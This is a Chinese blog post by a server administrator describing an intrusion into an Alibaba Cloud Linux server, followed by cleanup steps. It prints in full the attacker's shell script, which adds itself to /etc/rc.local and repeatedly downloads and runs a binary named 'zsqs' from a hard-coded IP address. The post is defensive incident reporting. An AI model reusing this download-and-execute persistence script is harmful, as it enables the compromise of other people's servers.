垃圾脚本黑我linux服务器

今天接到短信 阿里云Linux服务器被黑

脚本如下:

  • echo "sh /etc/chongfu.sh &" >> /etc/rc.local : 开机自启动
  • 自动下载   ./wget -P /tmp/  http://61.147.198.172/zsqs &> /dev/null
  •  Centos_sshd_killn=$(ps aux | grep "/tmp/zsqs" | grep -v grep | wc -l) 找zsqs有多少个,kill 防止启动多个实例
 

 

#!/bin/bash

#Welcome like-minded friends to come to exchange.
#We are a group of people who have a dream.
#                qun:10776621
#                2016-06-14
if [ "sh /etc/chongfu.sh &" = "$(cat /etc/rc.local | grep /etc/chongfu.sh | grep -v grep)" ]; then
    echo ""
else
    echo "sh /etc/chongfu.sh &" >> /etc/rc.local
fi
while [ 1 ]; do
    Centos_sshd_killn=$(ps aux | grep "/tmp/zsqs" | grep -v grep | wc -l)
    if [[ $Centos_sshd_killn -eq 0 ]]; then
        if [ ! -f "/tmp/zsqs" ]; then
            if [ -f "/usr/bin/wget" ]; then
                cp /usr/bin/wget .
                chmod +x wget
                #./wget -P . http://61.147.198.172/zsqs
                ./wget -P /tmp/  http://61.147.198.172/zsqs &> /dev/null
                chmod 755 /tmp/zsqs
                rm wget -rf
            else
                echo "No wget"
            fi
        fi
        /tmp/zsqs &
        #./zsqs &
    elif [[ $Centos_sshd_killn -gt 1 ]]; then
        for killed in $(ps aux | grep "zsqs" | grep -v grep | awk '{print $2}'); do
            Centos_sshd_killn=((Centos_sshd_killn-1))
            if [[ $Centos_sshd_killn -eq 1 ]]; then
                continue
            else
                kill -9 $killed
            fi
        done
    else
        echo ""
    fi
    Centos_ssh_killn=$(ps aux | grep "/tmp/zsqs" | grep -v grep | wc -l)
    if [[ $Centos_ssh_killn -eq 0 ]]; then
        if [ ! -f "/tmp/zsqs" ]; then
            if [ -f "/usr/bin/wget" ]; then
                cp /usr/bin/wget .
                chmod +x wget
                #./wget -P .  http://61.147.198.172/zsqs
                ./wget -P /tmp/  http://61.147.198.172/zsqs &> /dev/null
                chmod 755 /tmp/zsqs
                rm wget -rf
            else
                echo "No wget"
            fi
        fi
        /tmp/zsqs &
        #./zsqs &
    elif [[ $Centos_ssh_killn -gt 1 ]]; then
        for killed in $(ps aux | grep "zsqs" | grep -v grep | awk '{print $2}'); do
            Centos_ssh_killn=((Centos_ssh_killn-1))
            if [[ $Centos_ssh_killn -eq 1 ]]; then
                continue
            else
                kill -9 $killed
            fi
        done
    else
        echo ""
    fi
    sleep 600
done

简单解决步骤:

1. 结束进程

 

 ps aux | grep "zsqs" | grep -v grep | awk '{print $2}'| xargs kill -9
2. 清除自动启动脚本 
vim /etc/rc.local  去掉 sh /etc/chongfu.sh &
3. 清除 脚本 
rm -rf /etc/chongfu.sh  /tem/chongfu.sh   /tmp/zsqs
4. 修改登录密码
passwd

5.重启。

reboot 

 

存在风险 :  
zsqs是可执行文件 不知道有没有 替换果我的系统文件 或者执行过隐藏启动命令 在排查吧 今天就到这儿了

 

 

 

 

 

posted @   托马斯布莱克  阅读(935)  评论(0编辑  收藏  举报
(评论功能已被禁用)
编辑推荐:
· AI与.NET技术实操系列:基于图像分类模型对图像进行分类
· go语言实现终端里的倒计时
· 如何编写易于单元测试的代码
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
阅读排行:
· 25岁的心里话
· 闲置电脑爆改个人服务器(超详细) #公网映射 #Vmware虚拟网络编辑器
· 零经验选手,Compose 一天开发一款小游戏!
· 通过 API 将Deepseek响应流式内容输出到前端
· AI Agent开发,如何调用三方的API Function,是通过提示词来发起调用的吗
点击右上角即可分享
微信分享提示